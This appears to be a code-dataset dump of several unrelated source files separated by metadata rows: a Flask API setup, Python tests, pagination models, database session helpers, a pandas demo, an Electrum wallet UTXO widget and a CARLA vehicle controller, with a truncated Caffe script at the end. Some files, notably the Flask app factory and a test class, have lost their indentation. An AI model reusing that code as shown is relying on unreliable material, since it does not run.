] | null | null | null | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
] | null | null | null | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_cors import CORS
from flask_mongoengine import MongoEngine
from flask_jwt_extended import JWTManager
from datetime import timedelta
# from flask import Response, request
db = MongoEngine()
def create_app():
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}})
app.config['MONGODB_SETTINGS'] = {
'host': os.environ['MONGODB_HOST'],
'username': os.environ['MONGODB_USERNAME'],
'password': os.environ['MONGODB_PASSWORD'],
'db': 'webapp'
}
app.config["JWT_SECRET_KEY"] = os.environ["JWT_SECRET_KEY"]
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
app.config["JWT_REFRESH_TOKEN_EXPIRES"] = timedelta(days=15)
from .routes import auth
app.register_blueprint(auth.auth_bluprint)
from .routes import employees
app.register_blueprint(employees.employees_bluprint)
db.init_app(app)
JWTManager(app)
return app
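# Minimal usage sketch (assumes the MONGODB_* and JWT_SECRET_KEY environment
# variables read above are set; host/port are illustrative defaults):
if __name__ == "__main__":
    create_app().run(host="0.0.0.0", port=5000)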
| 21.977778 | 64 | 0.690597 |
c5031c8dd8c7d4ac4badfcceeb7a31cf6b95383d | 506 | py | Python | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | if __name__ == '__main__':
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), '..'))
from Pyst import TestCase, WasRun
class TestCaseTest(TestCase):
def setUp(self):
self.test = WasRun('testMethod')
def testRunning(self):
self.test.run()
assert(self.test.wasRun)
def testSetUp(self):
self.test.run()
assert(self.test.wasSetUp)
TestCaseTest('testSetUp').run()
TestCaseTest('testRunning').run()
| 21.083333 | 60 | 0.632411 |
31db29ccb37473f8381c9a78f8ab253aad35d85b | 1,130 | py | Python | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2021-05-20T16:52:08.000Z | 2021-05-20T16:52:08.000Z | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-12-30T16:44:56.000Z | 2020-12-30T16:44:56.000Z | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | tqtezos/pytezos | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | [
"MIT"
] | 1 | 2022-03-20T19:01:00.000Z | 2022-03-20T19:01:00.000Z | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.json')
def test_storage_encoding_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| 40.357143 | 112 | 0.748673 |
35c8fe7d00c96a573757764ebafe9669144bd599 | 975 | py | Python | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox(capabilities={"marionette": False})
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def open_home_page(self):
wd = self.wd
wd.get(self.base_url)
def destroy(self):
self.wd.quit() | 26.351351 | 75 | 0.606154 |
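# Usage sketch (illustrative only; the base URL is an assumption for the example,
# and in the test suite the pytest fixture layer normally owns this lifecycle):
if __name__ == "__main__":
    app = Application(browser="chrome", base_url="http://localhost/addressbook/")
    app.open_home_page()
    print(app.is_valid())
    app.destroy()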
409fcf1321996e20e20cc7ac5965eeb813c73c55 | 5,649 | py | Python | packages/models-library/src/models_library/rest_pagination.py | sanderegg/osparc-simcore | 13560a554c52b07e2aba67f77baaf4d5ba9edb90 | [
"MIT"
] | null | null | null | packages/models-library/src/models_library/rest_pagination.py | sanderegg/osparc-simcore | 13560a554c52b07e2aba67f77baaf4d5ba9edb90 | [
"MIT"
] | 55 | 2018-05-15T09:47:00.000Z | 2022-03-31T06:56:50.000Z | packages/models-library/src/models_library/rest_pagination.py | odeimaiz/osparc-simcore | 71c2fc58dcfe067487dcd75cb70298a4d6237e97 | [
"MIT"
] | 1 | 2020-04-22T15:06:58.000Z | 2020-04-22T15:06:58.000Z | from typing import Generic, List, Optional, TypeVar
from pydantic import (
AnyHttpUrl,
BaseModel,
Extra,
Field,
NonNegativeInt,
PositiveInt,
validator,
)
from pydantic.generics import GenericModel
DEFAULT_NUMBER_OF_ITEMS_PER_PAGE = 20
def monkey_patch_pydantic_url_regex() -> None:
# waiting for PR https://github.com/samuelcolvin/pydantic/pull/2512 to be released into
# pydantic main codebase
import pydantic
if pydantic.VERSION > "1.8.2":
raise RuntimeError(
(
"Please check that PR https://github.com/samuelcolvin/pydantic/pull/2512 "
"was merged AND added in this version."
"If already present in this version, remove this monkey_patch"
)
)
import re
from typing import Pattern
from pydantic import networks
def url_regex() -> Pattern[str]:
_url_regex_cache = networks._url_regex_cache # pylint: disable=protected-access
if _url_regex_cache is None:
_url_regex_cache = re.compile(
r"(?:(?P<scheme>[a-z][a-z0-9+\-.]+)://)?" # scheme https://tools.ietf.org/html/rfc3986#appendix-A
r"(?:(?P<user>[^\s:/]*)(?::(?P<password>[^\s/]*))?@)?" # user info
r"(?:"
r"(?P<ipv4>(?:\d{1,3}\.){3}\d{1,3})(?=$|[/:#?])|" # ipv4
r"(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])(?=$|[/:#?])|" # ipv6
r"(?P<domain>[^\s/:?#]+)" # domain, validation occurs later
r")?"
r"(?::(?P<port>\d+))?" # port
r"(?P<path>/[^\s?#]*)?" # path
r"(?:\?(?P<query>[^\s#]+))?" # query
r"(?:#(?P<fragment>\S+))?", # fragment
re.IGNORECASE,
)
return _url_regex_cache
networks.url_regex = url_regex
monkey_patch_pydantic_url_regex()
class PageMetaInfoLimitOffset(BaseModel):
limit: PositiveInt = DEFAULT_NUMBER_OF_ITEMS_PER_PAGE
total: NonNegativeInt
offset: NonNegativeInt = 0
count: NonNegativeInt
@validator("offset")
@classmethod
def check_offset(cls, v, values):
if v > 0 and v >= values["total"]:
raise ValueError(
f"offset {v} cannot be equal or bigger than total {values['total']}, please check"
)
return v
@validator("count")
@classmethod
def check_count(cls, v, values):
if v > values["limit"]:
raise ValueError(
f"count {v} bigger than limit {values['limit']}, please check"
)
if v > values["total"]:
raise ValueError(
f"count {v} bigger than expected total {values['total']}, please check"
)
if "offset" in values and (values["offset"] + v) > values["total"]:
raise ValueError(
f"offset {values['offset']} + count {v} is bigger than allowed total {values['total']}, please check"
)
return v
class Config:
extra = Extra.forbid
schema_extra = {
"examples": [
{"total": 7, "count": 4, "limit": 4, "offset": 0},
]
}
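# Validation sketch (illustrative helper, not used elsewhere in this module):
# the validators above reject a page whose count exceeds its limit or total.
def _example_page_meta_validation() -> None:
    from pydantic import ValidationError
    ok = PageMetaInfoLimitOffset(limit=4, total=7, offset=0, count=4)
    assert ok.count == 4
    try:
        PageMetaInfoLimitOffset(limit=4, total=7, offset=0, count=5)
    except ValidationError:
        pass  # count=5 > limit=4 is rejected by check_count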
class PageLinks(BaseModel):
self: AnyHttpUrl
first: AnyHttpUrl
prev: Optional[AnyHttpUrl]
next: Optional[AnyHttpUrl]
last: AnyHttpUrl
class Config:
extra = Extra.forbid
ItemT = TypeVar("ItemT")
class Page(GenericModel, Generic[ItemT]):
"""
Paginated response model of ItemTs
"""
meta: PageMetaInfoLimitOffset = Field(alias="_meta")
links: PageLinks = Field(alias="_links")
data: List[ItemT]
@validator("data", pre=True)
@classmethod
def convert_none_to_empty_list(cls, v):
if v is None:
v = []
return v
@validator("data")
@classmethod
def check_data_compatible_with_meta(cls, v, values):
if "meta" not in values:
# if the validation failed in meta this happens
raise ValueError("meta not in values")
if len(v) != values["meta"].count:
raise ValueError(
f"container size [{len(v)}] must be equal to count [{values['meta'].count}]"
)
return v
class Config:
extra = Extra.forbid
schema_extra = {
"examples": [
# first page Page[str]
{
"_meta": {"total": 7, "count": 4, "limit": 4, "offset": 0},
"_links": {
"self": "http://osparc.io/v2/listing?offset=0&limit=4",
"first": "http://osparc.io/v2/listing?offset=0&limit=4",
"prev": None,
"next": "http://osparc.io/v2/listing?offset=1&limit=4",
"last": "http://osparc.io/v2/listing?offset=1&limit=4",
},
"data": ["data 1", "data 2", "data 3", "data 4"],
},
# second and last page
{
"_meta": {"total": 7, "count": 3, "limit": 4, "offset": 1},
"_links": {
"self": "http://osparc.io/v2/listing?offset=1&limit=4",
"first": "http://osparc.io/v2/listing?offset=0&limit=4",
"prev": "http://osparc.io/v2/listing?offset=0&limit=4",
"next": None,
"last": "http://osparc.io/v2/listing?offset=1&limit=4",
},
"data": ["data 5", "data 6", "data 7"],
},
]
}
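# Usage sketch (illustrative helper): a concrete page type is built by
# parametrising the generic model, mirroring the first example in Config above.
def _example_page_of_str() -> "Page[str]":
    return Page[str].parse_obj(
        {
            "_meta": {"total": 7, "count": 2, "limit": 4, "offset": 0},
            "_links": {
                "self": "http://osparc.io/v2/listing?offset=0&limit=4",
                "first": "http://osparc.io/v2/listing?offset=0&limit=4",
                "prev": None,
                "next": None,
                "last": "http://osparc.io/v2/listing?offset=0&limit=4",
            },
            "data": ["item 1", "item 2"],
        }
    )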
| 32.096591 | 117 | 0.506992 |
fb8bfc144ef36a0d4f926e6b570a842f1a7a66ca | 2,957 | py | Python | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | null | null | null | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | 1 | 2021-02-23T22:56:13.000Z | 2021-02-23T22:56:13.000Z | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | null | null | null | import functools
import logging
import typing
from contextlib import contextmanager
from sqlalchemy.exc import SQLAlchemyError
from .exceptions import CorporaException
from ..corpora_orm import Base, DBSessionMaker
logger = logging.getLogger(__name__)
class DbUtils:
"""DbUtils as a singleton to avoid creating excess sessions."""
__instance = None
class __DbUtils:
def __init__(self):
self._session = None
@property
def session(self):
if not self._session:
self._session = DBSessionMaker().session()
return self._session
def get(self, table: Base, entity_id: typing.Union[str, typing.Tuple[str]]) -> typing.Union[Base, None]:
"""
Query a table row by its primary key
:param table: SQLAlchemy Table to query
:param entity_id: Primary key of desired row
:return: SQLAlchemy Table object, None if not found
"""
return self.session.query(table).get(entity_id)
def query(self, table_args: typing.List[Base], filter_args: typing.List[bool] = None) -> typing.List[Base]:
"""
Query the database using the current DB session
:param table_args: List of SQLAlchemy Tables to query/join
:param filter_args: List of SQLAlchemy filter conditions
:return: List of SQLAlchemy query response objects
"""
return (
self.session.query(*table_args).filter(*filter_args).all()
if filter_args
else self.session.query(*table_args).all()
)
def commit(self):
"""
            Commit pending changes to the database. Rollback on error is handled by db_session_manager.
"""
self.session.commit()
def delete(self, db_object: Base):
self.session.delete(db_object)
def close(self):
self.session.close()
self._session = None
def __init__(self):
if not DbUtils.__instance:
DbUtils.__instance = DbUtils.__DbUtils()
def __getattr__(self, name):
return getattr(self.__instance, name)
@contextmanager
def db_session_manager(commit=False):
"""
:param commit: Changes will be committed when context ends.
"""
try:
db = DbUtils()
yield db
if commit:
db.commit()
except SQLAlchemyError:
db.session.rollback()
msg = "Failed to commit."
logger.exception(msg)
raise CorporaException(msg)
finally:
db.close()
def db_session(commit=False):
"""
:param commit: passed to db_session_manager
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
with db_session_manager(commit):
rv = func(*args, **kwargs)
return rv
return wrapper
return decorator
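# Usage sketch (illustrative; `table` is any mapped ORM class from corpora_orm):
# the decorator and the context manager share the same underlying session.
def _example_delete_row(table, entity_id):
    with db_session_manager(commit=True) as db:
        row = db.get(table, entity_id)
        if row is not None:
            db.delete(row)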
| 27.37963 | 115 | 0.595536 |
1cc6c0247a3d41cae0569d2ce12d2d8ff1fec709 | 595 | py | Python | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | code/pandas/pd_duplicated.py | yuguiyang/python_demo | 1be2406bfc920e22a0f92bf10d9a3665984067ba | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 15 16:03:44 2017
@author: hexo
"""
import pandas as pd
import numpy as np
data = pd.DataFrame({'k1': ['one'] * 3 + ['two'] * 4,
'k2': [1, 1, 2, 3, 3, 4, 4]})
data
data.duplicated()
data.drop_duplicates()
data['v1'] = range(7)
data.drop_duplicates(['k1'])
data.drop_duplicates(['k1', 'k2'], keep='last')  # keep='last' replaces the removed take_last=True
# replacing sentinel values
data = pd.Series([1., -999., 2., -999., -1000., 3.])
data
data.replace(-999, np.nan)
data.replace([-999, -1000], np.nan)
data.replace([-999, -1000], [np.nan, 0])
data.replace({-999: np.nan, -1000: 0})
| 14.875 | 53 | 0.573109 |
0f106d2e9b61e5a496d7cecc5027dd1ac994a78c | 10,496 | py | Python | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | electrum_grlc/gui/qt/utxo_list.py | garlico-in/electrum-grlc | 06ba1b330ef354ca575d0688cbd2d64a90fd276e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from typing import Optional, List, Dict, Sequence, Set
from enum import IntEnum
import copy
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QStandardItemModel, QStandardItem, QFont
from PyQt5.QtWidgets import QAbstractItemView, QMenu, QLabel, QHBoxLayout
from electrum_grlc.i18n import _
from electrum_grlc.transaction import PartialTxInput
from .util import MyTreeView, ColorScheme, MONOSPACE_FONT, EnterButton
class UTXOList(MyTreeView):
_spend_set: Optional[Set[str]] # coins selected by the user to spend from
_utxo_dict: Dict[str, PartialTxInput] # coin name -> coin
class Columns(IntEnum):
OUTPOINT = 0
ADDRESS = 1
LABEL = 2
AMOUNT = 3
HEIGHT = 4
headers = {
Columns.ADDRESS: _('Address'),
Columns.LABEL: _('Label'),
Columns.AMOUNT: _('Amount'),
Columns.HEIGHT: _('Height'),
Columns.OUTPOINT: _('Output point'),
}
filter_columns = [Columns.ADDRESS, Columns.LABEL, Columns.OUTPOINT]
stretch_column = Columns.LABEL
ROLE_PREVOUT_STR = Qt.UserRole + 1000
def __init__(self, parent):
super().__init__(parent, self.create_menu,
stretch_column=self.stretch_column)
self._spend_set = None
self._utxo_dict = {}
self.wallet = self.parent.wallet
self.setModel(QStandardItemModel(self))
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.setSortingEnabled(True)
self.update()
def update(self):
# not calling maybe_defer_update() as it interferes with coincontrol status bar
utxos = self.wallet.get_utxos()
self._maybe_reset_spend_list(utxos)
self._utxo_dict = {}
self.model().clear()
self.update_headers(self.__class__.headers)
for idx, utxo in enumerate(utxos):
self.insert_utxo(idx, utxo)
self.filter()
# update coincontrol status bar
if self._spend_set is not None:
coins = [self._utxo_dict[x] for x in self._spend_set]
coins = self._filter_frozen_coins(coins)
amount = sum(x.value_sats() for x in coins)
amount_str = self.parent.format_amount_and_units(amount)
num_outputs_str = _("{} outputs available ({} total)").format(len(coins), len(utxos))
self.parent.set_coincontrol_msg(_("Coin control active") + f': {num_outputs_str}, {amount_str}')
else:
self.parent.set_coincontrol_msg(None)
def insert_utxo(self, idx, utxo: PartialTxInput):
address = utxo.address
height = utxo.block_height
name = utxo.prevout.to_str()
name_short = utxo.prevout.txid.hex()[:16] + '...' + ":%d" % utxo.prevout.out_idx
self._utxo_dict[name] = utxo
label = self.wallet.get_label_for_txid(utxo.prevout.txid.hex()) or self.wallet.get_label(address)
amount = self.parent.format_amount(utxo.value_sats(), whitespaces=True)
labels = [name_short, address, label, amount, '%d'%height]
utxo_item = [QStandardItem(x) for x in labels]
self.set_editability(utxo_item)
utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_CLIPBOARD_DATA)
utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_PREVOUT_STR)
utxo_item[self.Columns.ADDRESS].setFont(QFont(MONOSPACE_FONT))
utxo_item[self.Columns.AMOUNT].setFont(QFont(MONOSPACE_FONT))
utxo_item[self.Columns.OUTPOINT].setFont(QFont(MONOSPACE_FONT))
SELECTED_TO_SPEND_TOOLTIP = _('Coin selected to be spent')
if name in (self._spend_set or set()):
            for col_idx, col in enumerate(utxo_item):
                col.setBackground(ColorScheme.GREEN.as_color(True))
                if col_idx != self.Columns.OUTPOINT:
                    col.setToolTip(SELECTED_TO_SPEND_TOOLTIP)
if self.wallet.is_frozen_address(address):
utxo_item[self.Columns.ADDRESS].setBackground(ColorScheme.BLUE.as_color(True))
utxo_item[self.Columns.ADDRESS].setToolTip(_('Address is frozen'))
if self.wallet.is_frozen_coin(utxo):
utxo_item[self.Columns.OUTPOINT].setBackground(ColorScheme.BLUE.as_color(True))
utxo_item[self.Columns.OUTPOINT].setToolTip(f"{name}\n{_('Coin is frozen')}")
else:
tooltip = ("\n" + SELECTED_TO_SPEND_TOOLTIP) if name in (self._spend_set or set()) else ""
utxo_item[self.Columns.OUTPOINT].setToolTip(name + tooltip)
self.model().insertRow(idx, utxo_item)
def get_selected_outpoints(self) -> Optional[List[str]]:
if not self.model():
return None
items = self.selected_in_column(self.Columns.OUTPOINT)
return [x.data(self.ROLE_PREVOUT_STR) for x in items]
def _filter_frozen_coins(self, coins: List[PartialTxInput]) -> List[PartialTxInput]:
coins = [utxo for utxo in coins
if (not self.wallet.is_frozen_address(utxo.address) and
not self.wallet.is_frozen_coin(utxo))]
return coins
def set_spend_list(self, coins: Optional[List[PartialTxInput]]):
if coins is not None:
coins = self._filter_frozen_coins(coins)
self._spend_set = {utxo.prevout.to_str() for utxo in coins}
else:
self._spend_set = None
self.update()
def get_spend_list(self) -> Optional[Sequence[PartialTxInput]]:
if self._spend_set is None:
return None
utxos = [self._utxo_dict[x] for x in self._spend_set]
return copy.deepcopy(utxos) # copy so that side-effects don't affect utxo_dict
def _maybe_reset_spend_list(self, current_wallet_utxos: Sequence[PartialTxInput]) -> None:
if self._spend_set is None:
return
# if we spent one of the selected UTXOs, just reset selection
utxo_set = {utxo.prevout.to_str() for utxo in current_wallet_utxos}
if not all([prevout_str in utxo_set for prevout_str in self._spend_set]):
self._spend_set = None
def create_menu(self, position):
selected = self.get_selected_outpoints()
if selected is None:
return
menu = QMenu()
menu.setSeparatorsCollapsible(True) # consecutive separators are merged together
coins = [self._utxo_dict[name] for name in selected]
if len(coins) == 0:
menu.addAction(_("Spend (select none)"), lambda: self.set_spend_list(coins))
else:
menu.addAction(_("Spend"), lambda: self.set_spend_list(coins))
if len(coins) == 1:
utxo = coins[0]
addr = utxo.address
txid = utxo.prevout.txid.hex()
# "Details"
tx = self.wallet.db.get_transaction(txid)
if tx:
label = self.wallet.get_label_for_txid(txid)
menu.addAction(_("Details"), lambda: self.parent.show_transaction(tx, tx_desc=label))
# "Copy ..."
idx = self.indexAt(position)
if not idx.isValid():
return
self.add_copy_menu(menu, idx)
# "Freeze coin"
if not self.wallet.is_frozen_coin(utxo):
menu.addAction(_("Freeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], True))
else:
menu.addSeparator()
menu.addAction(_("Coin is frozen"), lambda: None).setEnabled(False)
menu.addAction(_("Unfreeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], False))
menu.addSeparator()
# "Freeze address"
if not self.wallet.is_frozen_address(addr):
menu.addAction(_("Freeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], True))
else:
menu.addSeparator()
menu.addAction(_("Address is frozen"), lambda: None).setEnabled(False)
menu.addAction(_("Unfreeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], False))
menu.addSeparator()
elif len(coins) > 1: # multiple items selected
menu.addSeparator()
addrs = [utxo.address for utxo in coins]
is_coin_frozen = [self.wallet.is_frozen_coin(utxo) for utxo in coins]
is_addr_frozen = [self.wallet.is_frozen_address(utxo.address) for utxo in coins]
if not all(is_coin_frozen):
menu.addAction(_("Freeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, True))
if any(is_coin_frozen):
menu.addAction(_("Unfreeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, False))
if not all(is_addr_frozen):
menu.addAction(_("Freeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, True))
if any(is_addr_frozen):
menu.addAction(_("Unfreeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, False))
menu.exec_(self.viewport().mapToGlobal(position))
def get_filter_data_from_coordinate(self, row, col):
if col == self.Columns.OUTPOINT:
return self.get_role_data_from_coordinate(row, col, role=self.ROLE_PREVOUT_STR)
return super().get_filter_data_from_coordinate(row, col)
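# Coin-control flow sketch (illustrative; `utxo_list` is an existing UTXOList and
# `coins` a list of PartialTxInput from wallet.get_utxos()): the send tab drives
# the selection through these three calls.
def _example_coin_control(utxo_list: 'UTXOList', coins):
    utxo_list.set_spend_list(coins)        # frozen coins filtered out, rows highlighted
    selected = utxo_list.get_spend_list()  # deep copies, safe to mutate
    utxo_list.set_spend_list(None)         # back to "spend from all"
    return selected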
| 46.648889 | 120 | 0.657298 |
e9fad523e9374bfeb845f19f6412e635aed4df7e | 3,812 | py | Python | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 21 | 2022-02-15T10:11:54.000Z | 2022-03-24T17:44:29.000Z | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | null | null | null | haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 3 | 2022-02-22T11:11:43.000Z | 2022-03-17T17:58:44.000Z | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example control for vehicles
"""
import math
import carla
from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.basic_agent import LocalPlanner
from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.local_planner import RoadOption
from haco.DIDrive_core.simulators.carla_data_provider import CarlaDataProvider
from haco.DIDrive_core.simulators.srunner.scenariomanager.actorcontrols.basic_control import BasicControl
class NpcVehicleControl(BasicControl):
"""
Controller class for vehicles derived from BasicControl.
The controller makes use of the LocalPlanner implemented in CARLA.
Args:
actor (carla.Actor): Vehicle actor that should be controlled.
"""
_args = {'K_P': 1.0, 'K_D': 0.01, 'K_I': 0.0, 'dt': 0.05}
def __init__(self, actor, args=None):
super(NpcVehicleControl, self).__init__(actor)
self._local_planner = LocalPlanner( # pylint: disable=undefined-variable
self._actor, opt_dict={
'target_speed': self._target_speed * 3.6, 'lateral_control_dict': self._args})
if self._waypoints:
self._update_plan()
def _update_plan(self):
"""
Update the plan (waypoint list) of the LocalPlanner
"""
plan = []
for transform in self._waypoints:
waypoint = CarlaDataProvider.get_map().get_waypoint(
transform.location, project_to_road=True, lane_type=carla.LaneType.Any
)
plan.append((waypoint, RoadOption.LANEFOLLOW))
self._local_planner.set_global_plan(plan)
def reset(self):
"""
Reset the controller
"""
if self._actor and self._actor.is_alive:
if self._local_planner:
self._local_planner.reset_vehicle()
self._local_planner = None
self._actor = None
def run_step(self):
"""
Execute on tick of the controller's control loop
If _waypoints are provided, the vehicle moves towards the next waypoint
with the given _target_speed, until reaching the final waypoint. Upon reaching
the final waypoint, _reached_goal is set to True.
If _waypoints is empty, the vehicle moves in its current direction with
the given _target_speed.
If _init_speed is True, the control command is post-processed to ensure that
the initial actor velocity is maintained independent of physics.
"""
self._reached_goal = False
if self._waypoints_updated:
self._waypoints_updated = False
self._update_plan()
target_speed = self._target_speed
self._local_planner.set_speed(target_speed * 3.6)
control = self._local_planner.run_step(debug=False)
# Check if the actor reached the end of the plan
if self._local_planner.done():
self._reached_goal = True
self._actor.apply_control(control)
if self._init_speed:
current_speed = math.sqrt(self._actor.get_velocity().x ** 2 + self._actor.get_velocity().y ** 2)
# If _init_speed is set, and the PID controller is not yet up to the point to take over,
# we manually set the vehicle to drive with the correct velocity
if abs(target_speed - current_speed) > 3:
yaw = self._actor.get_transform().rotation.yaw * (math.pi / 180)
vx = math.cos(yaw) * target_speed
vy = math.sin(yaw) * target_speed
self._actor.set_velocity(carla.Vector3D(vx, vy, 0))
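# Usage sketch (illustrative; assumes `vehicle` is an already-spawned carla.Vehicle,
# `route` a list of carla.Transform waypoints, and that the BasicControl base class
# exposes update_waypoints/update_target_speed setters as in ScenarioRunner):
def _example_control_loop(vehicle, route, target_speed=8.0):
    controller = NpcVehicleControl(vehicle)
    controller.update_waypoints(route)
    controller.update_target_speed(target_speed)
    while not controller._reached_goal:
        controller.run_step()
    controller.reset()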
| 36.304762 | 108 | 0.663169 |
60ba267a6bebd580aeedf342a3ed46329af52c54 | 7,360 | py | Python | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | 3 | 2017-03-16T07:42:31.000Z | 2021-07-15T22:09:46.000Z | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | null | null | null | models/market1501/generate_resnet50.py | zhunzhong07/caffe-reid | 7468850ab80858006bd65bcc6203e0581c83aea9 | [
"BSD-2-Clause"
] | 2 | 2019-03-09T02:47:50.000Z | 2020-08-24T15:43:38.000Z | import _init_paths
import os
import os.path as osp
import caffe
from caffe import layers as L, params as P
from caffe import tools
from caffe.model_libs import *
def res_unit(net, bottom, in_c, out_c, stride, base_name, post, is_train=False):
assert (out_c % 4 == 0)
